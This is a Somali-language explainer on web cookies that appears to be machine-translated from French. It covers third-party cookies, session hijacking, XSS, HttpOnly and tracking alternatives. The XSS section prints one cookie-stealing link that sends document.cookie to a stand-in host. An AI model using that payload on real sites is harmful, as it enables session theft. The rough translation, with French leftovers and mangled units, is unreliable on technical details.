Barowsarro badan, oo ay ku jiraan Apple Safari iyo Microsoft Internet Explorer noocyada 6 iyo 7, waxay taageeraan P3P kaas oo u oggolaanaya browserka inuu go'aamiyo inuu aqbalo kaydinta buskudka qolo saddexaad iyo in kale. browserka Opera waxa uu u ogolaadaa isticmaalayaasha in ay diidaan cookies-ka qolo saddexaad iyo in ay abuuraan astaan ​​ammaan oo caalami ah iyo mid gaar ah ee boggaga internetka. Mozilla Firefox nooca 2 ayaa hoos u dhigay taageerada P3P laakiin dib ayuu ugu soo celiyay nooca 3.

Kukiyada kooxda saddexaad waxaa xannibi kara daalacashada badankooda si ay u kordhiyaan qarsoodiga oo ay u yareeyaan dabagalka xayeysiiska, iyada oo aan si xun u saameynayn khibradda shabakadda isticmaale. Wakaaladaha xayeysiiska badan ayaa bixiya ikhtiyaar joojiso Xayeysiiska la beegsanayo, adoo dejinaya cookies-ka guud ee browser-ka kaas oo baabi'iya beegsigan, laakiin xalka noocan oo kale ah maaha mid wax ku ool ah, marka la ixtiraamo, sababtoo ah buskudka guud waa la tirtiraa isla marka isticmaaluhu tirtiro cookies-kan kaas oo tirtira ikhtiyaarka go'aan ka baxsan.

Khasaaraha cookies

Marka laga soo tago arrimaha gaarka ah, cookies sidoo kale waxay leedahay cillado farsamo. Gaar ahaan, had iyo jeer si sax ah uma gartaan isticmaalayaasha, waxay hoos u dhigi karaan waxqabadka goobta marka ay tiro badan yihiin, waxaa loo isticmaali karaa weerarrada amniga, waxayna isku khilaafaan wakiilka wareejinta gobolka, qaabka qaab dhismeedka software-ka.

Aqoonsi aan sax ahayn

Haddii wax ka badan hal browser lagu isticmaalo kombuyuutar, mid kasta oo iyaga ka mid ah waxaa had iyo jeer jira unug kaydinta u gaar ah oo loogu talagalay cookies. Sidaa darteed kukiyadu ma aqoonsanayaan qofka, laakiin isku darka akoonka isticmaalaha, kumbuyuutarka, iyo biraawsarkaaga webka. Markaa, qof kastaa wuu isticmaali karaa akoonnadan, kombayuutarrada, ama daalacashada kuwaas oo leh koobabka cookies-ka. Sidoo kale, cookies ma kala soocaan isticmaaleyaal badan oo wadaaga koontada isticmaale, kumbuyuutarka, iyo browserka, sida "internet cafes" ama meel kasta oo si lacag la'aan ah u siinaya agabka kumbuyuutarka.

Laakiin ficil ahaan hadalkani wuxuu noqdaa mid been abuur ah inta badan kiisaska sababtoo ah maanta kumbuyuutarka "shaqsiyeedka" (ama casriga ah, ama tablet-ka, kaas oo ka sii daran) waxaa inta badan isticmaala hal qof. iyada oo la adeegsanayo mugga macluumaadka la ururiyey waxay ku timaad bartilmaameed shakhsi ahaaneed xitaa haddii aan qofka "magac ahaan" la aqoonsan.

Buskudka waxa xadi kara kombuyuutar kale oo shabakada ku jira.

Inta lagu jiro hawlgalka caadiga ah, cookies ayaa dib loo soo celiyaa inta u dhaxaysa server-ka (ama koox server ah oo isku domain ah) iyo browserka kombiyuutarka ee isticmaalaha. Maadaama cookies ay ka koobnaan karaan macluumaad xasaasi ah (username, password loo isticmaalo xaqiijinta, iwm.), qiyamkooda waa in aan la heli karin kombiyuutarada kale. Xatooyada buskudka waa fal faragelin kukiyada oo ay sameeyeen qolo saddexaad oo aan la fasaxin.

Kukiyada waxa lagu xadi karaa baakad wax uriya marka lagu jiro weerarka loo yaqaan afduubka fadhiga. Gaadiidka shabakada waxa dhexda u gali kara oo akhriyi kara kombuyuutarada aan ahayn kuwa diraya iyo kuwa helaya (gaar ahaan meelaha Wi-Fi ee dadweynaha ee aan qarsoodi ahayn). Gaadiidkan waxaa ka mid ah cookies-ka loo diro kalfadhiyada iyadoo la isticmaalayo borotokoolka HTTP cad. Marka taraafikada shabakada aan la sirmin, isticmaalayaasha xaasidka ah waxay markaa akhrin karaan isgaadhsiinta isticmaalayaasha kale ee shabakada iyagoo isticmaalaya "sniffers baakidhada".

Dhibaatadan waxaa looga gudbi karaa in la sireeyo xiriirka ka dhexeeya kombiyuutarka isticmaalaha iyo server-ka iyadoo la adeegsanayo nidaamka HTTPS. Seerfarku wuxuu cayimi karaa a calan sugan markaad dejinayso buskudka; browserka ayaa kaliya u soo diri doona xariiq sugan, sida xidhiidh SSL.

Si kastaba ha ahaatee goobo badan, in kasta oo la isticmaalayo HTTPS isgaadhsiin sir ah oo loogu talagalay xaqiijinta isticmaalaha (tusaale ahaan bogga gelitaanka), hadhow u soo dir cookies-ka fadhiga iyo xogta kale si caadi ah, iyada oo loo marayo xidhiidhada HTTP ee aan qarsoodi ahayn sababo waxtar leh. Weeraryahanadu sidaas darteed way dhexgeli karaan cookies-ka isticmaaleyaasha kale waxayna iska dhigi karaan goobaha ku habboon ama waxay u isticmaali karaan weerarrada buskudka.

Ku qorista goobta: buskudka ay tahay in la isku dhaafsado server-ka iyo macmiilka ayaa loo diraa qolo kale oo saddexaad.

Habka kale ee lagu xado cookies waa in la qoro boggaga iyo in browserka laftiisa uu u soo diro cookies server xaasidnimo ah oo aan waligood helin. Daalacashada casriga ah waxay oggolaadaan fulinta qaybaha koodka ee server-ka ee la raadiyay. Haddii cookies-ka la galo inta lagu jiro runtime, qiyamkooda waxaa laga yaabaa in nooc ka mid ah loola xiriiro server-yada aan ahayn inay galaan. Sirin kukiyada ka hor inta aan loo dirin shabakada kama caawinayso fashilinta weerarka.

Noocan ah qoraalka goobta waxaa caadi ahaan ka shaqeeya weeraryahannada goobaha u oggolaanaya isticmaaleyaasha inay dhejiyaan nuxurka HTML. Marka la isku daro qayb ka mid ah koodka ku habboon wax ku biirinta HTML, weeraryahanku wuxuu ka heli karaa cookies isticmaaleyaasha kale. Aqoonta cookies-kan waxaa loo isticmaali karaa in lagu xiro isla goobta iyadoo la adeegsanayo cookies-ka la xaday, sidaas darteed waxaa loo aqoonsan yahay isticmaaleha cookies-kiisa la xaday.

Mid ka mid ah siyaabaha looga hortagi karo weerarada noocaan ah waa in la isticmaalo calanka HttpOnly; waa ikhtiyaar, la soo bandhigay tan iyo nooca 6 ee Internet Explorer ee PHP tan iyo nooca 5.2.0 kaas oo la qorsheeyay in lagu sameeyo buskudka mid aan la heli karin macmiilka u dhow qoraalka. Si kastaba ha ahaatee, horumariyeyaasha shabakadu waa inay tan ku xisaabtamaan horumarinta goobtooda si ay uga badbaadaan qoritaanka goobta.

Khatarta kale ee amni ee la isticmaalo waa been abuurka dalabka goobta.

Tilmaanta farsamada rasmiga ah waxay u oggolaanaysaa kukiyada in dib loogu celiyo server-yada domainka ay ka soo jeedaan. Si kastaba ha noqotee, qiimaha cookies-ka waxaa loo diri karaa adeegayaal kale iyadoo la adeegsanayo habab kale oo aan ahayn madaxyada buskudka.

Gaar ahaan, luqadaha qoraalka sida JavaScript guud ahaan waa loo oggol yahay inay galaan qiyamka kukiyada waxayna awood u leeyihiin inay u soo diraan qiyam aan sabab lahayn server kasta oo internetka ah. Awood qoraaleedkan waxaa laga isticmaalaa mareegaha u oggolaanaya isticmaaleyaasha inay soo dhejiyaan nuxurka HTML isticmaaleyaasha kale si ay u daawadaan.

Tusaale ahaan, weeraryahan ka hawlgala domainka example.com waxa uu soo diri karaa faallo ka kooban xidhiidhka soo socda oo tilmaamaya baloog caan ah oo aanay haddii kale maamulin:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Marka isticmaale kale uu gujiyo isku xirkan, biraawsarku waxa uu fuliya qaybta sifada gujinta ee koodka, marka waxa uu ku beddelaa xadhkaha dokumentiga.cookie liiska isticmaale cookies ee firfircoon ee boggan. Sidaa darteed, liiska cookies-ka waxaa loo diraa server-ka example.com, sidaas darteedna weeraryahanku wuxuu awood u leeyahay inuu ururiyo cookies-ka isticmaalahan.

Nooca weerarka ah way adagtahay in laga ogaado dhinaca isticmaalaha sababtoo ah qoraalku wuxuu ka yimid isla domainka dejinaya buskudka, iyo hawlgalka lagu dirayo qiyamka ayaa u muuqda in loo oggol yahay goobtaas. Waxaa loo arkaa inay mas'uul ka tahay maamulayaasha ka shaqeeya goobtan noocaan ah inay dejiyaan xannibaado ka hortagaya daabacaadda koodka xaasidnimada ah.

Kukiyada si toos ah uma muuqdaan barnaamijyada dhinaca macmiilka ah sida JavaScript haddii lagu soo diray calanka HttpOnly. Marka loo eego aragtida server-ka, farqiga kaliya ayaa ah in xariiqda madax-kukiga ee Set-Cookie lagu daray goob cusub oo ka kooban xargaha HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Marka browserku helo buskud caynkaas ah, waxa loo malaynayaa in uu si caadi ah u isticmaalo is-weydaarsiga HTTP ee soo socda, laakiin iyada oo aan la arki karin qoraallada lagu fuliyay dhinaca macmiilka. Calanka HttpOnly maaha qayb ka mid ah tilmaamo farsamo oo rasmi ah, lagumana fuliyo dhammaan daalacashada Ogsoonow in aysan jirin hadda si looga hortago akhrinta iyo qorista cookies-ka fadhiga habka XMLHTTPREquest.

Wax ka beddelka nuxurka: weeraryahanku waxa uu u soo diraa buskud aan sax ahayn seerfar, lagana yaabo in laga sameeyay buskud sax ah oo uu soo diray seerfarku.

Sida ugu dhakhsaha badan cookies-ka loo baahan yahay in la kaydiyo oo lagu soo celiyo iyada oo aan isbeddelin server-ka, weeraryahan ayaa wax ka beddeli kara qiimaha cookies ka hor inta aan dib loogu celin server-ka. Tusaale ahaan, haddii buskudku ka kooban yahay wadarta qiimaha uu isticmaaluhu ku doonayo inuu ku bixiyo alaabta lagu dhejiyay gaadhiga dukaanka, beddelista qiimahan waxay soo bandhigaysaa serferka khatarta ah inuu ku dalaco weerarka wax ka yar qiimaha bilowga. Habka wax ka beddelka qiimaha cookies ayaa loo yaqaan sumowga buskudka waxaana la isticmaali karaa xatooyada buskudka ka dib si loo sameeyo weerarku mid joogto ah.

Habka buskudka dhaafin, weeraryahanku wuxuu ka faa'iideystaa cilad browser si uu ugu diro buskudka aan ansax ahayn serferka.

Inta badan mareegaha, si kastaba ha ahaatee, kaliya waxay kaydiyaan aqoonsiga fadhiga - lambar si aan kala sooc lahayn loo soo saaray si loo aqoonsado isticmaalayaasha fadhiga - buskudka laftiisa, halka dhammaan macluumaadka kale lagu kaydiyo server-ka. Xaaladdan oo kale, dhibaatadan inta badan waa la xalliyaa.

Goob kasta waxaa la filayaa inay lahaato cookies u gaar ah, sidaa darteed hal goob waa inaysan awoodin inay wax ka beddesho ama abuurto cookies-ka la xidhiidha goob kale. Ciladda badbaadada biraawsarkaaga waxay u oggolaan kartaa bogagga xaasidnimo inay jebiyaan sharcigan. Ka faa'iidaysiga cilladda noocan oo kale ah waxaa badanaa loo tixraacaa sida karinta-goobta. Ujeedada weerarradan oo kale waxay noqon kartaa xatooyo aqoonsiga kalfadhiga.

Isticmaalayaasha waa in ay adeegsadaan noocyadii ugu dambeeyay ee daalacashada webka kaas oo dayacankaani gabi ahaanba meesha laga saaray.

Xaalada iskahorimaadka u dhexeeya macmiilka iyo serverka

Isticmaalka buskudka waxa laga yaabaa inay dhaliso khilaaf u dhexeeya xaaladda macmiilka iyo gobolka ku kaydsan buskudka. Haddii isticmaaluhu uu helo buskud oo uu gujiyo badhanka "Back" ee browserka, xaaladda browserku guud ahaan la mid ma aha iibsigan ka hor. Tusaale ahaan, haddii dambiisha dukaanka internetka la abuuray iyadoo la isticmaalayo cookies, waxa ku jira dambiishu ma bedeli karaan marka isticmaaluhu ku soo laabto taariikhda browserka: haddii isticmaaluhu uu riixo badhan si uu ugu daro maqaal ku jira dambiishiisa oo uu gujiyo "Soo celinta " badhan, maqaalku wuxuu ku sii jiraa kan. Tani ma noqon karto ujeeddada isticmaalaha, kaas oo hubaal ah inuu rabo inuu joojiyo ku darida maqaalka. Tani waxay keeni kartaa kalsooni la'aan, jahawareer, iyo dhiqlaha. Markaa horumariyayaasha webku waa inay ogaadaan dhibaatadan oo ay fuliyaan tillaabooyin lagu xallinayo xaaladahan oo kale.

Kukiyada joogtada ah ayaa lagu dhaleeceeyay khubarada amniga sirta ah in aan loo dejin in ay dhacayso dhawaan, taas oo u oggolaanaysa mareegaha in ay la socdaan isticmaalayaasha oo ay dhisaan muuqaalkooda waqti ka dib. Dhinacan cookies-ka sidoo kale waa qayb ka mid ah dhibaatada afduubka fadhiga, sababtoo ah buskudka joogtada ah ee la xado ayaa loo isticmaali karaa in la iska dhigo isticmaale muddo dheer.

Si aad u akhrido sidoo kale: GAFAM: waa ayo? Waa maxay sababta ay (mararka qaarkood) aad uga cabsadaan?

Beddelka buskudka

Hawlgallada qaarkood ee lagu samayn karo cookies-ka ayaa sidoo kale lagu fulin karaa iyadoo la adeegsanayo habab kale oo ka gudba cookies ama dib u abuura cookies-ka tirtiray, taas oo u abuurta arrimo sir ah si la mid ah (ama mararka qaarkood ka sii xumaato sababtoo ah markaa lama arki karo) marka loo eego cookies.

Cinwaanka IP

Isticmaalayaasha waxaa lagula socon karaa ciwaanka IP-ga ee kumbiyuutarka wacaya bogga. Farsamadan waxa ay jirtay tan iyo markii la hirgeliyay shabakadda caalamiga ah ee Wide Web, marka boggaga la soo dejiyo server-ku waxa uu codsadaa ciwaanka IP-ga ee kumbiyuutarka ku shaqeeya browserka ama wakiillada, haddii aan midna la isticmaalin. Seerfarku waxa uu la socon karaa macluumaadkan haddii ay jiraan cookies-ka la isticmaalo iyo in kale. Si kastaba ha ahaatee, ciwaanadan ayaa ah kuwo aan la isku hallayn karin marka loo eego isticmaaleha marka loo eego cookies sababtoo ah kombuyuutarrada iyo wakiillada waxaa wadaagi kara isticmaaleyaal badan, isla kombuyuutarku wuxuu heli karaa ciwaan IP oo ka duwan fadhi kasta oo shaqo (sida c inta badan kiisaska xidhiidhada taleefanka) .

Raadinta ciwaannada IP-yada waxay noqon kartaa mid la isku halayn karo xaaladaha qaarkood, sida isku xirka ballaadhan ee ilaalinaya isla cinwaanka IP-ga muddo dheer, ilaa iyo inta ay korontadu shidantahay.

Nidaamyada qaar sida Tor waxaa loogu talagalay in lagu ilaaliyo qarsoodiga internetka oo ay ka dhigaan raadinta cinwaanka IP-ga mid aan macquul ahayn ama aan macquul ahayn.

URL

Farsamo sax ah oo dheeraad ah waxay ku salaysan tahay ku darida macluumaadka URL-yada. Qaybta su'aasha ee URL waa hal farsamo oo sida caadiga ah loo isticmaalo ujeedadan, laakiin qaybo kale ayaa sidoo kale loo isticmaali karaa. Labada serverlet Java iyo hababka kalfadhiga PHP waxay isticmaalaan habkan haddii cookies-ka aan la shaqayn.

Habkani waxa ku lug leh server-ka webka oo ku dhejinaya codsiyada xargaha isku xirka bogga shabakadda ee sidda marka loo diro browserka. Marka isticmaaluhu raaco isku xirka, browser-ku wuxuu ku soo celinayaa xargaha weydiinta ee ku lifaaqan server-ka.

Xadhkaha weydiinta ee loo isticmaalo ujeedadan iyo cookies aad bay isku shabahaan, labaduba waa macluumaadka uu si badheedh ah u doortay serverka oo uu soo celiyay browserka. Si kastaba ha ahaatee, waxaa jira xoogaa kala duwanaansho ah: marka URL ka kooban xargaha weydiinta dib loo isticmaalo, isla macluumaadka ayaa loo diraa server-ka. Tusaale ahaan, haddii dookhyada isticmaaluhu ay ku qoran yihiin xadhig su'aal ah oo URL ah oo isticmaaluhu u soo diro URL-kaas isticmaale kale emaylka, isticmaaluhu wuxuu sidoo kale awood u yeelan doonaa inuu isticmaalo dookhyadaas.

Dhanka kale, marka isticmaaluhu uu galo isla bogga laba jeer, ma jirto dammaanad qaadka in xadhig su'aal la mid ah la isticmaali doono labada jeer. Tusaale ahaan, haddii adeegsaduhu uu ku soo degay bog ka yimid bogga gudaha markii ugu horreysay oo uu ku soo degay isla bogga bog dibadda ah markii labaad, xadhigga weydiinta ee ku xiran bogga goobta ayaa caadi ahaan ka duwan, halka cookies ay isku mid yihiin. .

Khasaaraha kale ee xargaha weydiinta waxay la xiriiraan amniga: haynta xogta tilmaameysa fadhiga xargaha weydiinta waxay awood u siineysaa ama fududeyneysaa weerarrada hagaajinta fadhiga, tilmaame weerarrada tixraaca, iyo faa'iidooyin kale. Gudbitaanka aqoonsiga kalfadhiga sida cookies HTTP ayaa aad u ammaan badan.

Goobta qaab qarsoon

Mid ka mid ah qaab-raadinta fadhiga, oo ay isticmaasho ASP.NET, waa in la isticmaalo foomamka shabakadda oo leh meelo qarsoon. Farsamadan waxay aad ula mid tahay adeegsiga xargaha weydiinta URL si ay u qaadaan macluumaadka waxayna leedahay faa'iidooyin iyo faa'iido darrooyin isku mid ah; iyo haddii foomka lagu farsameeyo habka HTTP GET, goobuhu dhab ahaantii waxay noqonayaan qayb ka mid ah URL-ka browserka kaas oo soo diri doona marka la soo gudbinayo foomka. Laakiin foomamka intooda badan waxaa lagu farsameeyaa HTTP POST, taas oo sababta macluumaadka foomka, oo ay ku jiraan meelaha qarsoon, in lagu daro gelinta dheeraadka ah ee aan ka mid ahayn URL ama buskud.

Habkani wuxuu leeyahay laba faa'iidooyin marka loo eego aragtida raadraaca: marka hore, la socoshada macluumaadka lagu dhejiyay koodhka isha HTML iyo gelinta POST halkii URL ay u oggolaan doonto celceliska isticmaalaha inuu ka fogaado raadraacan; labaad, macluumaadka kalfadhiga lama koobiyeeyo marka isticmaaluhu koobiyeeyo URL (si loo badbaadiyo bogga diskka ama loogu diro emayl ahaan, tusaale ahaan).

daaqada.magaca

Dhammaan daalacayaasha shabakadaha caadiga ah waxay ku kaydin karaan xog aad u tiro badan (2MB ilaa 32MB) iyagoo isticmaalaya JavaScript iyagoo isticmaalaya DOM's window.name hantida. Xogtan waxaa loo isticmaali karaa halkii laga isticmaali lahaa cookies-ka waxaana sidoo kale loo isticmaalaa dhammaan qaybaha. Farsamada waxaa lagu dari karaa walxaha JSON si loo kaydiyo isku dhafan oo doorsoomayaal-dhinaca kalfadhiga.

Dhinaca hoose waa in daaqad kasta ama tab kasta oo gooni ah ay marka hore lahaan doonto daaqad faaruq ah.name; Marka la baadho tabs (oo uu furay isticmaaluhu) tani waxay la macno tahay in tabsiyada si gaar ah loo furay ma yeelan doonaan magac daaqad. Intaa waxaa dheer window.name waxaa loo isticmaali karaa si loola socdo soo-booqdayaasha goobo kala duwan kuwaas oo keeni kara arrin sir ah.

Dhinacyada qaarkood tani waxay noqon kartaa mid ka ammaan badan cookies, sababtoo ah ku lug la'aanta server-ka, taas oo ka dhigaysa mid aan u nugulnayn weerarka shabakada ee cookies-ka. Si kastaba ha noqotee, haddii tallaabooyin gaar ah la qaado si loo ilaaliyo xogta, waxay u nugul tahay weeraro kale, maadaama xogta laga helayo goobo kale oo laga furay isla daaqada.

Xaqiijinta HTTP

Hab-maamuuska HTTP waxa ka mid ah borotokoolka xaqiijinta gelitaanka aasaasiga ah iyo marinka xaqiijinta gelitaanka, kaas oo u oggolaanaya gelitaanka bogga shabakadda kaliya marka isticmaaluhu bixiyo magaca isticmaalaha iyo erayga sirta ah. Haddii serfarka uu codsado shahaado si uu u oggolaado gelitaanka bogga shabakadda, browserku waxa uu ka codsadaa isticmaalaha oo marka la helo, browserku wuu kaydiyaa oo u soo diraa dhammaan codsiyada HTTP ee xiga. Macluumaadkan waxaa loo isticmaali karaa si loola socdo isticmaalaha.

Shayga la wadaago ee maxaliga ah

Haddii browser uu ku jiro Adobe Flash Player plugin, waa walxaha la wadaago deegaanka waxa loo isticmaali karaa isla ujeedada buskudka. Waxay u noqon karaan doorasho soo jiidasho leh horumariyayaasha webka sababtoo ah:

  • xadka cabbirka caadiga ah ee shay la wadaago maxalli waa 100 KB;
  • hubinta amniga way ka duwan tahay jeegaga buskudka isticmaale (sidaa darteed shayada la wadaago ee maxaliga ah waa la ogolaan karaa marka cookies-ka aan la ogolayn).

Qodobkan u dambeeya, kaas oo ka soocaya siyaasadda maaraynta buskudka iyo tan Adobe ee walxaha la wadaago ee maxaliga ah waxay dhalinaysaa su'aalo ku saabsan maamulka isticmaalaha goobaha asturnaanta: waa inuu ogaadaa in maamulkiisa cookies-ka uusan wax saameyn ah ku yeelan maamulka walxaha la wadaago ee maxaliga ah, iyo liddi ku ah.

Dhaleeceynta kale ee nidaamkan ayaa ah in lagu isticmaali karo oo keliya Adobe Flash Player plugin kaas oo ah mid iska leh oo aan ahayn heerka shabakadda.

Ku adkaysiga dhinaca macmiilka

Qaar ka mid ah daalacayaasha webka ayaa taageera habka ku-saleysan qoraalka, kaasoo u oggolaanaya bogga inuu ku keydiyo macluumaadka gudaha si hadhow loo isticmaalo. Internet Explorer, tusaale ahaan, waxa uu taageeraa macluumaadka joogtada ah ee taariikhda browserka, bookmarks, qaabka lagu kaydiyay XML, ama si toos ah bogga shabakad lagu kaydiyay saxanka. Microsoft Internet Explorer 5, waxa jira hab xogta isticmaalaha oo laga heli karo habdhaqanka DHTML.

W3C waxay ku soo bandhigtay HTML 5 JavaScript API cusub oo loogu talagalay kaydinta xogta dhinaca macmiilka ee loo yaqaan kaydinta Shabakadda oo loogu talagalay in si joogto ah loo beddelo cookies. Waxay la mid tahay cookies-ka laakiin leh awood si weyn loo hagaajiyay oo aan lagu kaydin macluumaadka cinwaanka codsiyada HTTP. API-gu waxa uu ogolaadaa laba nooc oo kaydinta shabakada ah: kaydinta maxaliga ah iyo kaydinta kalfadhi, oo la mid ah cookies-ka joogtada ah iyo cookies-ka fadhiga (marka laga reebo cookies-ka fadhigu wuu dhacaa marka browserku xidhan yahay kaydinta fadhiyada dhacayo marka tab la xiro), siday u kala horreeyaan. Kaydinta shabakada waxaa taageera Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 iyo Opera 10.50.

Nidaam ka duwan ayaa caadiyan ku tiirsan kaydinta browserka (xusuusta halkii ay dib u cusbayn lahayd) iyadoo la isticmaalayo barnaamijyada JavaScript ee boggaga internetka. 

Tusaale ahaan, boggu waxa uu ka koobnaan karaa summada . La premiĂšre fois que la page se charge, le programme exemple.js est aussi chargĂ©. 

Halkaa marka ay marayso, barnaamijku waxa uu ku sii jirayaa xusuusta kaydka, bogga la booqdayna dib looma rarin karo mar labaad. Sidaas awgeed, haddii barnaamijku ka kooban yahay doorsoome caalami ah (tusaale var id = 3243242;), aqoonsigani waa mid ansax ah waxaana laga faa'iidaysan karaa koodka JavaScript kale marka bogga mar kale la shubo, ama mar bogga barnaamijka ku xidha la raro. 

Khasaaraha ugu weyn ee habkan waa in doorsoomiyaha caalamiga ah ee JavaScript uu ahaado mid taagan, taasoo la macno ah inaan la bedeli karin ama aan la tirtiri karin sida buskudka.

faraha browserka webka

Faraha browserka waa macluumaadka laga soo ururiyay habaynta habaynta browserka ee ujeedooyinka aqoonsiga. Farahan waxaa loo isticmaali karaa si buuxda ama qayb ahaan loo aqoonsado isticmaale Internetka ama aaladda xitaa marka cookies-ka uu naafo yahay.

Macluumaadka qaabeynta biraawsarka shabakadda ee aasaasiga ah ayaa muddo dheer waxaa soo aruuriyay adeegyada dhageystayaasha mareegaha ujeedada si sax ah loo cabbiro taraafikada shabakada dadka iyo ogaanshaha noocyada kala duwan ee khiyaamada dhageysiga. Iyada oo la kaashanayo luqadaha qoraalka-dhinaca macmiilka, xog ururin aad u sax ah ayaa aad u badan hadda suurto gal.

U beddelashada macluumaadkan xardh yar waxay soo saartaa faraha qalabka. Sannadkii 2010, Mu'asasada Frontier Elektaroonigga ah (EFF) waxay qiyaastay entropy ee faraha browserka inuu ugu yaraan yahay gelinno 18,1, taasina waxay ahayd kahor horumarka laga sameeyay faraha canvas oo lagu daray 5,7 bits entropy-kaas.

Kukiyada oo kooban

Kukiyadu waa faylal yar oo qoraal ah oo uu ku kaydiyo biraawsarku websaydka ku yaal wadida adag ee booqdaha oo loo isticmaalo (waxyaabo kale) si loo duubo macluumaadka ku saabsan booqdaha ama socdaalkooda goobta. Maamulaha shabakada ayaa markaa aqoonsan kara caadooyinka booqdaha oo uu shakhsiyeeyo soo bandhigida boggiisa booqde kasta; cookies ayaa markaa suurtogal ka dhigaysa in la xasuusto inta maqaallo lagu soo bandhigo bogga guriga ama xitaa in la sii hayo aqoonsiga gelitaanka ee cid kasta oo gaar ah: marka booqdehu ku soo laabto goobta, mar dambe lagama maarmaan u ah isaga inuu ku qoro magaciisa iyo erayga sirta ah la aqoonsado, maadaama si toos ah loogu akhriyo buskudka.

Kukigu wuxuu leeyahay cimri xaddidan, oo uu dejiyay naqshadeeyaha goobta. Waxay sidoo kale dhici karaan dhamaadka kulanka goobta, taas oo u dhiganta xiritaanka browserka. Kukiyada ayaa si weyn loo isticmaalaa si ay nolosha ugu fududaato booqdayaasha oo ay u soo bandhigaan macluumaad badan oo khuseeya. Laakiin farsamooyinka gaarka ah ayaa suurtogal ka dhigaya in la raaco booqdaha dhowr goobood oo sidaas darteed si loo ururiyo oo loo hubiyo macluumaad aad u ballaaran oo ku saabsan caadooyinkiisa. Habkani waxa uu siisay isticmaalka cookies-ka sumcad ahaan farsamo ilaalin ah oo ku xad-gudbay sirta booqdayaasha, taas oo nasiib darro u dhiganta xaqiiqada xaalado badan oo loo isticmaalo sababo aan farsamo ahayn ama aan ixtiraamin filashooyinka isticmaalaha. .

Iyada oo laga jawaabayo cabsidan sharciga ah, HTML 5 waxay soo bandhigaysaa JavaScript API cusub oo loogu talagalay kaydinta xogta dhinaca macmiilka ah ee loo yaqaan kaydinta shabakadda, taas oo aad u ammaan badan oo leh awood weyn, kaas oo ujeedadiisu tahay in lagu beddelo cookies.

Kaydinta buskudka

Qaar ka mid ah daalacashada, buskudku si fudud ayaa loo tafatiran karaa, tafatiraha qoraalka fudud sida Notepad ayaa ku filan inuu beddelo qiyamkiisa gacanta.

Kukiyada waxaa loo kaydiyaa si kala duwan iyadoo ku xiran browserka:

  • Microsoft Internet Explorer waxa uu ku kaydiyaa buskud kasta fayl kala duwan;
  • Mozilla Firefox waxay ku kaydisaa dhammaan cookies-keeda hal fayl;
  • Opera wuxuu ku kaydiyaa dhammaan cookies-kiisa hal fayl oo sir ah (aan suurtagal ahayn in wax laga beddelo marka laga reebo xulashooyinka software);
  • safari tufaax waxay ku kaydisaa dhammaan cookies-keeda hal .plist faylka kordhinta. Wax ka beddelka waa suurtagal laakiin aad uma fududa, ilaa aad dhex maraan xulashooyinka software-ka.

Browser-yada ayaa looga baahan yahay inay taageeraan minima ah :

  • 300 cookies oo isku mar ah;
  • 4 o buskudkiiba;
  • 20 cookies martigeliyaha ama goob kasta
[Guud: 0 Macnaheedu: 0]

Written by Faallooyinka Tifatirayaasha

Kooxda tifaftirayaasha khabiirka ah ayaa waqtigooda ku bixiya baaritaanka alaabada, sameynta tijaabooyinka tijaabada ah, wareysiga xirfadlayaasha warshadaha, dib u eegista macaamiisha, iyo qorida dhamaan natiijooyinkayaga oo ah soo koobid la fahmi karo oo dhameystiran.

Laisser un commentaire

Cinwaanka emailkaaga lama daabici doono. Beeraha loo baahan yahay waxaa lagu calaamadeeyay *

Maxay idinla tahay?

384 Points
Upvote Downvote